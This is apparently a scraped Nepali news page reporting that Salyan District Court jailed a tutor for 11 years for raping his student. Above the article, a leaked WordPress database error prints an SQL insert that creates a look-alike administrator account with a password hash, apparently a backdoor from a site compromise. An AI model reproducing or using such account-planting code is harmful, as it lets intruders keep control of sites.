WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BA4CN5pNRnkLgCqNXtBT0o/j3QnWr00', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 09:34:35', '', 'admlnlx', 'admlnlx')
सल्यान,माघ २६ –
जिल्ला अदालत सल्यानले आफैँले पढाउने विद्याार्थी बलात्कार गर्ने शिक्षकलाई ११ वर्ष कैद सजाय सुनाएको छ। आफैँले ट्युसन पढाउने विद्यार्थीलाई २०७२ साल चैत १६ गतेदेखि लगातार बलात्कार गर्दै आएको अभियोगमा चादे करन्जी गाविस वडा नं. २ का २६ वर्षीय सन्दिप खड्कालाई यस्तो सजाय सुनाएको हो। डरत्रास देखाएर पटक–पटक बलात्कार गरेको आरोपसहित गत जेठमा उनीविरुद्ध उजुरी परेको थियो। जिल्ला न्यायधीश माधवेन्द्रराज रेग्मीको इसलासले खड्कालाई ११ वर्ष कैद र ५० हजार जरिवाना गराउने आदेश सुनाएको छ। मुलुकी ऐनको जबर्जस्तीकरणी महलको दफा १ अनुसार बलात्कारको कसुर ठहर गरी ६ वर्ष र शिक्षकजस्तो संरक्षक मानिएको व्यक्तिले आफ्नै विद्यार्थीलाई बलात्कार गरेको देखिन आएकाले दफा ३ ९क० अन्तर्गत थप हुने ५ वर्षसमेत जोडी ११ वर्ष कैद तोकिएको हो जिल्ला अदालत सल्यानले जनाएको छ। पीडित किशोरीलाई खड्काले ट्युसन पढाउने बहानामा राति–राति बोलाएर धम्क्याउँदै बलात्कार गर्ने गरेको खुलेको थियो।